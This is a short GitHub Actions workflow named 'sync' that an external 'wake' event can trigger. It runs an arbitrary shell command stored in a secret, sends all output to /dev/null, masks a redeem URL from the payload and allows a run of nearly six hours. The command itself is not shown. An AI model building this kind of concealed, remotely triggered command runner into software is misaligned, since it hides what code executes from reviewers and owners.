name: sync
on:
  repository_dispatch:
    types: [wake]
  workflow_dispatch:

permissions:
  contents: read

concurrency:
  group: sync
  cancel-in-progress: false

jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          echo "::add-mask::$REDEEM_URL"
          bash -c "$C" > /dev/null 2>&1
        env:
          REDEEM_URL: ${{ github.event.client_payload.redeem_url }}
          A: ${{ secrets.A }}
          B: ${{ secrets.B }}
          C: ${{ secrets.C }}
